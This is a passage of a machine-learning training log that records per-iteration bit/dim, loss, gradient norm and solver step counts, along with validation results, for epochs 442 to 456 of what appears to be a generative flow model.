10.00(10.00)\nIter 5069 | Time 40.0454(40.2044) | Bit/dim 1.0793(1.0772) | Xent 0.0000(0.0000) | Loss 1.0793(1.0772) | Error 0.0000(0.0000) Steps 440(441.68) | Grad Norm 0.0690(0.0774) | Total Time 10.00(10.00)\nIter 5070 | Time 38.9200(40.1659) | Bit/dim 1.0756(1.0772) | Xent 0.0000(0.0000) | Loss 1.0756(1.0772) | Error 0.0000(0.0000) Steps 440(441.63) | Grad Norm 0.0769(0.0774) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0442 | Time 14.8554, Epoch Time 307.4746(309.9419), Bit/dim 1.0720(best: 1.0715), Xent 0.0000, Loss 1.0720, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5071 | Time 39.7402(40.1531) | Bit/dim 1.0765(1.0771) | Xent 0.0000(0.0000) | Loss 1.0765(1.0771) | Error 0.0000(0.0000) Steps 446(441.76) | Grad Norm 0.0743(0.0773) | Total Time 10.00(10.00)\nIter 5072 | Time 43.0599(40.2403) | Bit/dim 1.0744(1.0771) | Xent 0.0000(0.0000) | Loss 1.0744(1.0771) | Error 0.0000(0.0000) Steps 446(441.89) | Grad Norm 0.0784(0.0773) | Total Time 10.00(10.00)\nIter 5073 | Time 41.5134(40.2785) | Bit/dim 1.0740(1.0770) | Xent 0.0000(0.0000) | Loss 1.0740(1.0770) | Error 0.0000(0.0000) Steps 440(441.83) | Grad Norm 0.0575(0.0767) | Total Time 10.00(10.00)\nIter 5074 | Time 39.1179(40.2437) | Bit/dim 1.0754(1.0769) | Xent 0.0000(0.0000) | Loss 1.0754(1.0769) | Error 0.0000(0.0000) Steps 446(441.96) | Grad Norm 0.1322(0.0784) | Total Time 10.00(10.00)\nIter 5075 | Time 38.7283(40.1983) | Bit/dim 1.0754(1.0769) | Xent 0.0000(0.0000) | Loss 1.0754(1.0769) | Error 0.0000(0.0000) Steps 440(441.90) | Grad Norm 0.0586(0.0778) | Total Time 10.00(10.00)\nIter 5076 | Time 40.6963(40.2132) | Bit/dim 1.0831(1.0771) | Xent 0.0000(0.0000) | Loss 1.0831(1.0771) | Error 0.0000(0.0000) Steps 446(442.02) | Grad Norm 0.0796(0.0779) | Total Time 10.00(10.00)\nIter 5077 | Time 40.2723(40.2150) | Bit/dim 1.0743(1.0770) | Xent 0.0000(0.0000) | Loss 1.0743(1.0770) | Error 0.0000(0.0000) Steps 446(442.14) | Grad Norm 0.0723(0.0777) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0443 | Time 14.8202, Epoch Time 310.3533(309.9542), Bit/dim 1.0715(best: 1.0715), Xent 0.0000, Loss 1.0715, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5078 | Time 41.0753(40.2408) | Bit/dim 1.0761(1.0769) | Xent 0.0000(0.0000) | Loss 1.0761(1.0769) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0579(0.0771) | Total Time 10.00(10.00)\nIter 5079 | Time 40.8736(40.2598) | Bit/dim 1.0781(1.0770) | Xent 0.0000(0.0000) | Loss 1.0781(1.0770) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.0566(0.0765) | Total Time 10.00(10.00)\nIter 5080 | Time 39.0060(40.2221) | Bit/dim 1.0783(1.0770) | Xent 0.0000(0.0000) | Loss 1.0783(1.0770) | Error 0.0000(0.0000) Steps 440(441.95) | Grad Norm 0.0733(0.0764) | Total Time 10.00(10.00)\nIter 5081 | Time 39.4570(40.1992) | Bit/dim 1.0752(1.0770) | Xent 0.0000(0.0000) | Loss 1.0752(1.0770) | Error 0.0000(0.0000) Steps 440(441.89) | Grad Norm 0.0641(0.0760) | Total Time 10.00(10.00)\nIter 5082 | Time 41.5312(40.2392) | Bit/dim 1.0790(1.0770) | Xent 0.0000(0.0000) | Loss 1.0790(1.0770) | Error 0.0000(0.0000) Steps 446(442.02) | Grad Norm 0.0600(0.0755) | Total Time 10.00(10.00)\nIter 5083 | Time 41.7705(40.2851) | Bit/dim 1.0769(1.0770) | Xent 0.0000(0.0000) | Loss 1.0769(1.0770) | Error 0.0000(0.0000) Steps 440(441.96) | Grad Norm 0.0881(0.0759) | Total Time 10.00(10.00)\nIter 5084 | Time 39.4931(40.2613) | Bit/dim 1.0731(1.0769) | Xent 0.0000(0.0000) | Loss 1.0731(1.0769) | Error 0.0000(0.0000) Steps 446(442.08) | Grad Norm 0.0640(0.0756) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0444 | Time 14.8996, Epoch Time 310.4499(309.9691), Bit/dim 1.0720(best: 1.0715), Xent 0.0000, Loss 1.0720, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5085 | Time 41.2615(40.2913) | Bit/dim 1.0759(1.0769) | Xent 0.0000(0.0000) | Loss 1.0759(1.0769) | Error 0.0000(0.0000) Steps 446(442.20) | Grad Norm 0.0717(0.0754) | Total Time 10.00(10.00)\nIter 5086 | Time 41.8669(40.3386) | Bit/dim 1.0791(1.0769) | Xent 0.0000(0.0000) | Loss 1.0791(1.0769) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0678(0.0752) | Total Time 10.00(10.00)\nIter 5087 | Time 40.7604(40.3513) | Bit/dim 1.0770(1.0769) | Xent 0.0000(0.0000) | Loss 1.0770(1.0769) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0692(0.0750) | Total Time 10.00(10.00)\nIter 5088 | Time 40.4374(40.3538) | Bit/dim 1.0755(1.0769) | Xent 0.0000(0.0000) | Loss 1.0755(1.0769) | Error 0.0000(0.0000) Steps 440(442.00) | Grad Norm 0.0663(0.0748) | Total Time 10.00(10.00)\nIter 5089 | Time 40.9287(40.3711) | Bit/dim 1.0763(1.0769) | Xent 0.0000(0.0000) | Loss 1.0763(1.0769) | Error 0.0000(0.0000) Steps 440(441.94) | Grad Norm 0.0921(0.0753) | Total Time 10.00(10.00)\nIter 5090 | Time 40.1069(40.3632) | Bit/dim 1.0751(1.0768) | Xent 0.0000(0.0000) | Loss 1.0751(1.0768) | Error 0.0000(0.0000) Steps 440(441.89) | Grad Norm 0.0713(0.0752) | Total Time 10.00(10.00)\nIter 5091 | Time 40.6335(40.3713) | Bit/dim 1.0767(1.0768) | Xent 0.0000(0.0000) | Loss 1.0767(1.0768) | Error 0.0000(0.0000) Steps 440(441.83) | Grad Norm 0.0569(0.0746) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0445 | Time 14.7990, Epoch Time 313.2543(310.0676), Bit/dim 1.0715(best: 1.0715), Xent 0.0000, Loss 1.0715, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5092 | Time 41.2545(40.3978) | Bit/dim 1.0796(1.0769) | Xent 0.0000(0.0000) | Loss 1.0796(1.0769) | Error 0.0000(0.0000) Steps 446(441.95) | Grad Norm 0.0542(0.0740) | Total Time 10.00(10.00)\nIter 5093 | Time 40.5972(40.4038) | Bit/dim 1.0754(1.0769) | Xent 0.0000(0.0000) | Loss 1.0754(1.0769) | Error 0.0000(0.0000) Steps 440(441.90) | Grad Norm 0.0940(0.0746) | Total Time 10.00(10.00)\nIter 5094 | Time 41.3206(40.4313) | Bit/dim 1.0756(1.0768) | Xent 0.0000(0.0000) | Loss 1.0756(1.0768) | Error 0.0000(0.0000) Steps 440(441.84) | Grad Norm 0.0801(0.0748) | Total Time 10.00(10.00)\nIter 5095 | Time 41.0053(40.4485) | Bit/dim 1.0752(1.0768) | Xent 0.0000(0.0000) | Loss 1.0752(1.0768) | Error 0.0000(0.0000) Steps 446(441.96) | Grad Norm 0.0665(0.0745) | Total Time 10.00(10.00)\nIter 5096 | Time 41.6199(40.4836) | Bit/dim 1.0806(1.0769) | Xent 0.0000(0.0000) | Loss 1.0806(1.0769) | Error 0.0000(0.0000) Steps 446(442.08) | Grad Norm 0.0867(0.0749) | Total Time 10.00(10.00)\nIter 5097 | Time 40.5252(40.4849) | Bit/dim 1.0728(1.0768) | Xent 0.0000(0.0000) | Loss 1.0728(1.0768) | Error 0.0000(0.0000) Steps 440(442.02) | Grad Norm 0.1213(0.0763) | Total Time 10.00(10.00)\nIter 5098 | Time 39.8950(40.4672) | Bit/dim 1.0755(1.0767) | Xent 0.0000(0.0000) | Loss 1.0755(1.0767) | Error 0.0000(0.0000) Steps 440(441.96) | Grad Norm 0.0860(0.0766) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0446 | Time 14.7623, Epoch Time 313.7080(310.1768), Bit/dim 1.0719(best: 1.0715), Xent 0.0000, Loss 1.0719, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5099 | Time 40.7655(40.4761) | Bit/dim 1.0804(1.0768) | Xent 0.0000(0.0000) | Loss 1.0804(1.0768) | Error 0.0000(0.0000) Steps 446(442.08) | Grad Norm 0.0476(0.0757) | Total Time 10.00(10.00)\nIter 5100 | Time 42.1693(40.5269) | Bit/dim 1.0750(1.0768) | Xent 0.0000(0.0000) | Loss 1.0750(1.0768) | Error 0.0000(0.0000) Steps 440(442.02) | Grad Norm 0.0876(0.0761) | Total Time 10.00(10.00)\nIter 5101 | Time 40.0760(40.5134) | Bit/dim 1.0792(1.0769) | Xent 0.0000(0.0000) | Loss 1.0792(1.0769) | Error 0.0000(0.0000) Steps 446(442.14) | Grad Norm 0.0873(0.0764) | Total Time 10.00(10.00)\nIter 5102 | Time 41.4436(40.5413) | Bit/dim 1.0787(1.0769) | Xent 0.0000(0.0000) | Loss 1.0787(1.0769) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0593(0.0759) | Total Time 10.00(10.00)\nIter 5103 | Time 40.9364(40.5532) | Bit/dim 1.0777(1.0769) | Xent 0.0000(0.0000) | Loss 1.0777(1.0769) | Error 0.0000(0.0000) Steps 446(442.19) | Grad Norm 0.0713(0.0758) | Total Time 10.00(10.00)\nIter 5104 | Time 40.3442(40.5469) | Bit/dim 1.0759(1.0769) | Xent 0.0000(0.0000) | Loss 1.0759(1.0769) | Error 0.0000(0.0000) Steps 446(442.31) | Grad Norm 0.0552(0.0751) | Total Time 10.00(10.00)\nIter 5105 | Time 41.1519(40.5650) | Bit/dim 1.0746(1.0768) | Xent 0.0000(0.0000) | Loss 1.0746(1.0768) | Error 0.0000(0.0000) Steps 446(442.42) | Grad Norm 0.0624(0.0748) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0447 | Time 14.7920, Epoch Time 314.3384(310.3017), Bit/dim 1.0712(best: 1.0715), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5106 | Time 40.8066(40.5723) | Bit/dim 1.0764(1.0768) | Xent 0.0000(0.0000) | Loss 1.0764(1.0768) | Error 0.0000(0.0000) Steps 440(442.35) | Grad Norm 0.0736(0.0747) | Total Time 10.00(10.00)\nIter 5107 | Time 38.9329(40.5231) | Bit/dim 1.0790(1.0769) | Xent 0.0000(0.0000) | Loss 1.0790(1.0769) | Error 0.0000(0.0000) Steps 440(442.27) | Grad Norm 0.0808(0.0749) | Total Time 10.00(10.00)\nIter 5108 | Time 39.5545(40.4940) | Bit/dim 1.0752(1.0768) | Xent 0.0000(0.0000) | Loss 1.0752(1.0768) | Error 0.0000(0.0000) Steps 440(442.21) | Grad Norm 0.0852(0.0752) | Total Time 10.00(10.00)\nIter 5109 | Time 38.5498(40.4357) | Bit/dim 1.0757(1.0768) | Xent 0.0000(0.0000) | Loss 1.0757(1.0768) | Error 0.0000(0.0000) Steps 440(442.14) | Grad Norm 0.0663(0.0749) | Total Time 10.00(10.00)\nIter 5110 | Time 41.0553(40.4543) | Bit/dim 1.0741(1.0767) | Xent 0.0000(0.0000) | Loss 1.0741(1.0767) | Error 0.0000(0.0000) Steps 440(442.08) | Grad Norm 0.0604(0.0745) | Total Time 10.00(10.00)\nIter 5111 | Time 39.3435(40.4210) | Bit/dim 1.0788(1.0768) | Xent 0.0000(0.0000) | Loss 1.0788(1.0768) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.0671(0.0743) | Total Time 10.00(10.00)\nIter 5112 | Time 40.1205(40.4120) | Bit/dim 1.0789(1.0769) | Xent 0.0000(0.0000) | Loss 1.0789(1.0769) | Error 0.0000(0.0000) Steps 440(441.95) | Grad Norm 0.0950(0.0749) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0448 | Time 14.7011, Epoch Time 305.5031(310.1577), Bit/dim 1.0712(best: 1.0712), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5113 | Time 40.9361(40.4277) | Bit/dim 1.0789(1.0769) | Xent 0.0000(0.0000) | Loss 1.0789(1.0769) | Error 0.0000(0.0000) Steps 446(442.07) | Grad Norm 0.0622(0.0745) | Total Time 10.00(10.00)\nIter 5114 | Time 39.8053(40.4090) | Bit/dim 1.0795(1.0770) | Xent 0.0000(0.0000) | Loss 1.0795(1.0770) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.1130(0.0757) | Total Time 10.00(10.00)\nIter 5115 | Time 39.0936(40.3696) | Bit/dim 1.0738(1.0769) | Xent 0.0000(0.0000) | Loss 1.0738(1.0769) | Error 0.0000(0.0000) Steps 440(441.95) | Grad Norm 0.0774(0.0757) | Total Time 10.00(10.00)\nIter 5116 | Time 39.0391(40.3296) | Bit/dim 1.0762(1.0769) | Xent 0.0000(0.0000) | Loss 1.0762(1.0769) | Error 0.0000(0.0000) Steps 440(441.89) | Grad Norm 0.1001(0.0765) | Total Time 10.00(10.00)\nIter 5117 | Time 39.1018(40.2928) | Bit/dim 1.0773(1.0769) | Xent 0.0000(0.0000) | Loss 1.0773(1.0769) | Error 0.0000(0.0000) Steps 440(441.84) | Grad Norm 0.0843(0.0767) | Total Time 10.00(10.00)\nIter 5118 | Time 39.5423(40.2703) | Bit/dim 1.0744(1.0768) | Xent 0.0000(0.0000) | Loss 1.0744(1.0768) | Error 0.0000(0.0000) Steps 446(441.96) | Grad Norm 0.0697(0.0765) | Total Time 10.00(10.00)\nIter 5119 | Time 40.3796(40.2736) | Bit/dim 1.0778(1.0768) | Xent 0.0000(0.0000) | Loss 1.0778(1.0768) | Error 0.0000(0.0000) Steps 446(442.08) | Grad Norm 0.0560(0.0759) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0449 | Time 14.7723, Epoch Time 305.2510(310.0105), Bit/dim 1.0712(best: 1.0712), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5120 | Time 41.8439(40.3207) | Bit/dim 1.0760(1.0768) | Xent 0.0000(0.0000) | Loss 1.0760(1.0768) | Error 0.0000(0.0000) Steps 440(442.02) | Grad Norm 0.0648(0.0755) | Total Time 10.00(10.00)\nIter 5121 | Time 38.6951(40.2719) | Bit/dim 1.0796(1.0769) | Xent 0.0000(0.0000) | Loss 1.0796(1.0769) | Error 0.0000(0.0000) Steps 440(441.96) | Grad Norm 0.0640(0.0752) | Total Time 10.00(10.00)\nIter 5122 | Time 40.2275(40.2706) | Bit/dim 1.0806(1.0770) | Xent 0.0000(0.0000) | Loss 1.0806(1.0770) | Error 0.0000(0.0000) Steps 440(441.90) | Grad Norm 0.0861(0.0755) | Total Time 10.00(10.00)\nIter 5123 | Time 41.1099(40.2958) | Bit/dim 1.0732(1.0769) | Xent 0.0000(0.0000) | Loss 1.0732(1.0769) | Error 0.0000(0.0000) Steps 440(441.84) | Grad Norm 0.0629(0.0751) | Total Time 10.00(10.00)\nIter 5124 | Time 40.4925(40.3017) | Bit/dim 1.0707(1.0767) | Xent 0.0000(0.0000) | Loss 1.0707(1.0767) | Error 0.0000(0.0000) Steps 446(441.97) | Grad Norm 0.0687(0.0749) | Total Time 10.00(10.00)\nIter 5125 | Time 40.6290(40.3115) | Bit/dim 1.0777(1.0767) | Xent 0.0000(0.0000) | Loss 1.0777(1.0767) | Error 0.0000(0.0000) Steps 440(441.91) | Grad Norm 0.0769(0.0750) | Total Time 10.00(10.00)\nIter 5126 | Time 40.6238(40.3209) | Bit/dim 1.0805(1.0769) | Xent 0.0000(0.0000) | Loss 1.0805(1.0769) | Error 0.0000(0.0000) Steps 440(441.85) | Grad Norm 0.0966(0.0757) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0450 | Time 14.8414, Epoch Time 310.9020(310.0373), Bit/dim 1.0718(best: 1.0712), Xent 0.0000, Loss 1.0718, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5127 | Time 41.0953(40.3441) | Bit/dim 1.0824(1.0770) | Xent 0.0000(0.0000) | Loss 1.0824(1.0770) | Error 0.0000(0.0000) Steps 440(441.80) | Grad Norm 0.0609(0.0752) | Total Time 10.00(10.00)\nIter 5128 | Time 41.3729(40.3750) | Bit/dim 1.0741(1.0769) | Xent 0.0000(0.0000) | Loss 1.0741(1.0769) | Error 0.0000(0.0000) Steps 446(441.92) | Grad Norm 0.0989(0.0759) | Total Time 10.00(10.00)\nIter 5129 | Time 42.5628(40.4406) | Bit/dim 1.0753(1.0769) | Xent 0.0000(0.0000) | Loss 1.0753(1.0769) | Error 0.0000(0.0000) Steps 446(442.05) | Grad Norm 0.1062(0.0768) | Total Time 10.00(10.00)\nIter 5130 | Time 40.2631(40.4353) | Bit/dim 1.0744(1.0768) | Xent 0.0000(0.0000) | Loss 1.0744(1.0768) | Error 0.0000(0.0000) Steps 446(442.16) | Grad Norm 0.0830(0.0770) | Total Time 10.00(10.00)\nIter 5131 | Time 41.3110(40.4615) | Bit/dim 1.0770(1.0768) | Xent 0.0000(0.0000) | Loss 1.0770(1.0768) | Error 0.0000(0.0000) Steps 440(442.10) | Grad Norm 0.1329(0.0787) | Total Time 10.00(10.00)\nIter 5132 | Time 41.3311(40.4876) | Bit/dim 1.0786(1.0769) | Xent 0.0000(0.0000) | Loss 1.0786(1.0769) | Error 0.0000(0.0000) Steps 440(442.04) | Grad Norm 0.0897(0.0790) | Total Time 10.00(10.00)\nIter 5133 | Time 39.2706(40.4511) | Bit/dim 1.0751(1.0768) | Xent 0.0000(0.0000) | Loss 1.0751(1.0768) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.1245(0.0804) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0451 | Time 14.6837, Epoch Time 314.4093(310.1684), Bit/dim 1.0717(best: 1.0712), Xent 0.0000, Loss 1.0717, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5134 | Time 39.4738(40.4218) | Bit/dim 1.0767(1.0768) | Xent 0.0000(0.0000) | Loss 1.0767(1.0768) | Error 0.0000(0.0000) Steps 440(441.92) | Grad Norm 0.0642(0.0799) | Total Time 10.00(10.00)\nIter 5135 | Time 39.5516(40.3957) | Bit/dim 1.0718(1.0767) | Xent 0.0000(0.0000) | Loss 1.0718(1.0767) | Error 0.0000(0.0000) Steps 446(442.04) | Grad Norm 0.0804(0.0799) | Total Time 10.00(10.00)\nIter 5136 | Time 40.5634(40.4007) | Bit/dim 1.0782(1.0767) | Xent 0.0000(0.0000) | Loss 1.0782(1.0767) | Error 0.0000(0.0000) Steps 440(441.98) | Grad Norm 0.0900(0.0802) | Total Time 10.00(10.00)\nIter 5137 | Time 40.1988(40.3947) | Bit/dim 1.0805(1.0768) | Xent 0.0000(0.0000) | Loss 1.0805(1.0768) | Error 0.0000(0.0000) Steps 446(442.10) | Grad Norm 0.0873(0.0804) | Total Time 10.00(10.00)\nIter 5138 | Time 40.0656(40.3848) | Bit/dim 1.0767(1.0768) | Xent 0.0000(0.0000) | Loss 1.0767(1.0768) | Error 0.0000(0.0000) Steps 440(442.03) | Grad Norm 0.1066(0.0812) | Total Time 10.00(10.00)\nIter 5139 | Time 38.7939(40.3371) | Bit/dim 1.0754(1.0768) | Xent 0.0000(0.0000) | Loss 1.0754(1.0768) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.0649(0.0807) | Total Time 10.00(10.00)\nIter 5140 | Time 40.7899(40.3506) | Bit/dim 1.0759(1.0768) | Xent 0.0000(0.0000) | Loss 1.0759(1.0768) | Error 0.0000(0.0000) Steps 446(442.09) | Grad Norm 0.0786(0.0807) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0452 | Time 14.9141, Epoch Time 307.2762(310.0817), Bit/dim 1.0718(best: 1.0712), Xent 0.0000, Loss 1.0718, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5141 | Time 40.9957(40.3700) | Bit/dim 1.0759(1.0767) | Xent 0.0000(0.0000) | Loss 1.0759(1.0767) | Error 0.0000(0.0000) Steps 446(442.21) | Grad Norm 0.1147(0.0817) | Total Time 10.00(10.00)\nIter 5142 | Time 40.2770(40.3672) | Bit/dim 1.0737(1.0766) | Xent 0.0000(0.0000) | Loss 1.0737(1.0766) | Error 0.0000(0.0000) Steps 440(442.15) | Grad Norm 0.0986(0.0822) | Total Time 10.00(10.00)\nIter 5143 | Time 41.5301(40.4021) | Bit/dim 1.0772(1.0766) | Xent 0.0000(0.0000) | Loss 1.0772(1.0766) | Error 0.0000(0.0000) Steps 440(442.08) | Grad Norm 0.0624(0.0816) | Total Time 10.00(10.00)\nIter 5144 | Time 40.6513(40.4096) | Bit/dim 1.0770(1.0767) | Xent 0.0000(0.0000) | Loss 1.0770(1.0767) | Error 0.0000(0.0000) Steps 446(442.20) | Grad Norm 0.0702(0.0813) | Total Time 10.00(10.00)\nIter 5145 | Time 41.7376(40.4494) | Bit/dim 1.0780(1.0767) | Xent 0.0000(0.0000) | Loss 1.0780(1.0767) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0911(0.0816) | Total Time 10.00(10.00)\nIter 5146 | Time 39.9169(40.4334) | Bit/dim 1.0766(1.0767) | Xent 0.0000(0.0000) | Loss 1.0766(1.0767) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0825(0.0816) | Total Time 10.00(10.00)\nIter 5147 | Time 40.4454(40.4338) | Bit/dim 1.0798(1.0768) | Xent 0.0000(0.0000) | Loss 1.0798(1.0768) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.0645(0.0811) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0453 | Time 15.0143, Epoch Time 313.3263(310.1790), Bit/dim 1.0712(best: 1.0712), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5148 | Time 41.1612(40.4556) | Bit/dim 1.0745(1.0767) | Xent 0.0000(0.0000) | Loss 1.0745(1.0767) | Error 0.0000(0.0000) Steps 446(442.13) | Grad Norm 0.0597(0.0804) | Total Time 10.00(10.00)\nIter 5149 | Time 39.4420(40.4252) | Bit/dim 1.0783(1.0768) | Xent 0.0000(0.0000) | Loss 1.0783(1.0768) | Error 0.0000(0.0000) Steps 440(442.06) | Grad Norm 0.0672(0.0800) | Total Time 10.00(10.00)\nIter 5150 | Time 41.0518(40.4440) | Bit/dim 1.0714(1.0766) | Xent 0.0000(0.0000) | Loss 1.0714(1.0766) | Error 0.0000(0.0000) Steps 440(442.00) | Grad Norm 0.0985(0.0806) | Total Time 10.00(10.00)\nIter 5151 | Time 40.6164(40.4492) | Bit/dim 1.0806(1.0767) | Xent 0.0000(0.0000) | Loss 1.0806(1.0767) | Error 0.0000(0.0000) Steps 446(442.12) | Grad Norm 0.1092(0.0814) | Total Time 10.00(10.00)\nIter 5152 | Time 39.7168(40.4272) | Bit/dim 1.0742(1.0767) | Xent 0.0000(0.0000) | Loss 1.0742(1.0767) | Error 0.0000(0.0000) Steps 440(442.06) | Grad Norm 0.0550(0.0807) | Total Time 10.00(10.00)\nIter 5153 | Time 39.9483(40.4128) | Bit/dim 1.0807(1.0768) | Xent 0.0000(0.0000) | Loss 1.0807(1.0768) | Error 0.0000(0.0000) Steps 440(442.00) | Grad Norm 0.0592(0.0800) | Total Time 10.00(10.00)\nIter 5154 | Time 38.8754(40.3667) | Bit/dim 1.0762(1.0768) | Xent 0.0000(0.0000) | Loss 1.0762(1.0768) | Error 0.0000(0.0000) Steps 446(442.12) | Grad Norm 0.0922(0.0804) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0454 | Time 14.7099, Epoch Time 307.9974(310.1136), Bit/dim 1.0712(best: 1.0712), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5155 | Time 40.3221(40.3654) | Bit/dim 1.0767(1.0768) | Xent 0.0000(0.0000) | Loss 1.0767(1.0768) | Error 0.0000(0.0000) Steps 446(442.23) | Grad Norm 0.0607(0.0798) | Total Time 10.00(10.00)\nIter 5156 | Time 39.9141(40.3518) | Bit/dim 1.0745(1.0767) | Xent 0.0000(0.0000) | Loss 1.0745(1.0767) | Error 0.0000(0.0000) Steps 446(442.35) | Grad Norm 0.0691(0.0795) | Total Time 10.00(10.00)\nIter 5157 | Time 39.1238(40.3150) | Bit/dim 1.0708(1.0765) | Xent 0.0000(0.0000) | Loss 1.0708(1.0765) | Error 0.0000(0.0000) Steps 446(442.45) | Grad Norm 0.0811(0.0795) | Total Time 10.00(10.00)\nIter 5158 | Time 40.8218(40.3302) | Bit/dim 1.0809(1.0766) | Xent 0.0000(0.0000) | Loss 1.0809(1.0766) | Error 0.0000(0.0000) Steps 446(442.56) | Grad Norm 0.0983(0.0801) | Total Time 10.00(10.00)\nIter 5159 | Time 40.5228(40.3360) | Bit/dim 1.0767(1.0766) | Xent 0.0000(0.0000) | Loss 1.0767(1.0766) | Error 0.0000(0.0000) Steps 440(442.48) | Grad Norm 0.0877(0.0803) | Total Time 10.00(10.00)\nIter 5160 | Time 40.1532(40.3305) | Bit/dim 1.0785(1.0767) | Xent 0.0000(0.0000) | Loss 1.0785(1.0767) | Error 0.0000(0.0000) Steps 446(442.59) | Grad Norm 0.1132(0.0813) | Total Time 10.00(10.00)\nIter 5161 | Time 41.9152(40.3780) | Bit/dim 1.0789(1.0768) | Xent 0.0000(0.0000) | Loss 1.0789(1.0768) | Error 0.0000(0.0000) Steps 440(442.51) | Grad Norm 0.0850(0.0814) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0455 | Time 14.9648, Epoch Time 310.0775(310.1125), Bit/dim 1.0711(best: 1.0712), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5162 | Time 40.1386(40.3709) | Bit/dim 1.0714(1.0766) | Xent 0.0000(0.0000) | Loss 1.0714(1.0766) | Error 0.0000(0.0000) Steps 440(442.44) | Grad Norm 0.0544(0.0806) | Total Time 10.00(10.00)\nIter 5163 | Time 39.4101(40.3420) | Bit/dim 1.0804(1.0767) | Xent 0.0000(0.0000) | Loss 1.0804(1.0767) | Error 0.0000(0.0000) Steps 446(442.54) | Grad Norm 0.0543(0.0798) | Total Time 10.00(10.00)\nIter 5164 | Time 40.9828(40.3613) | Bit/dim 1.0755(1.0767) | Xent 0.0000(0.0000) | Loss 1.0755(1.0767) | Error 0.0000(0.0000) Steps 440(442.47) | Grad Norm 0.0670(0.0794) | Total Time 10.00(10.00)\nIter 5165 | Time 40.7401(40.3726) | Bit/dim 1.0729(1.0766) | Xent 0.0000(0.0000) | Loss 1.0729(1.0766) | Error 0.0000(0.0000) Steps 440(442.39) | Grad Norm 0.0865(0.0796) | Total Time 10.00(10.00)\nIter 5166 | Time 40.5305(40.3774) | Bit/dim 1.0807(1.0767) | Xent 0.0000(0.0000) | Loss 1.0807(1.0767) | Error 0.0000(0.0000) Steps 446(442.50) | Grad Norm 0.0716(0.0794) | Total Time 10.00(10.00)\nIter 5167 | Time 41.0611(40.3979) | Bit/dim 1.0777(1.0767) | Xent 0.0000(0.0000) | Loss 1.0777(1.0767) | Error 0.0000(0.0000) Steps 440(442.43) | Grad Norm 0.0853(0.0796) | Total Time 10.00(10.00)\nIter 5168 | Time 41.7964(40.4398) | Bit/dim 1.0779(1.0768) | Xent 0.0000(0.0000) | Loss 1.0779(1.0768) | Error 0.0000(0.0000) Steps 446(442.53) | Grad Norm 0.0930(0.0800) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0456 | Time 15.1593, Epoch Time 312.2156(310.1756), Bit/dim 1.0714(best: 1.0711), Xent 0.0000, Loss 1.0714, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5169 | Time 38.7103(40.3879) | Bit/dim 1.0791(1.0768) | Xent 0.0000(0.0000) | Loss 1.0791(1.0768) | Error 0.0000(0.0000) Steps 440(442.46) | Grad Norm 0.0531(0.0792) | Total Time 10.00(10.00)\nIter 5170 | Time 38.8005(40.3403) | Bit/dim 1.0771(1.0768) | Xent 0.0000(0.0000) | Loss 1.0771(1.0768) | Error 0.0000(0.0000) Steps 440(442.38) | Grad Norm 0.1294(0.0807) | Total Time 10.00(10.00)\nIter 5171 | Time 41.4595(40.3739) | Bit/dim 1.0786(1.0769) | Xent 0.0000(0.0000) | Loss 1.0786(1.0769) | Error 0.0000(0.0000) Steps 440(442.31) | Grad Norm 0.0822(0.0807) | Total Time 10.00(10.00)\nIter 5172 | Time 41.2354(40.3997) | Bit/dim 1.0756(1.0768) | Xent 0.0000(0.0000) | Loss 1.0756(1.0768) | Error 0.0000(0.0000) Steps 446(442.42) | Grad Norm 0.0601(0.0801) | Total Time 10.00(10.00)\nIter 5173 | Time 39.7153(40.3792) | Bit/dim 1.0777(1.0769) | Xent 0.0000(0.0000) | Loss 1.0777(1.0769) | 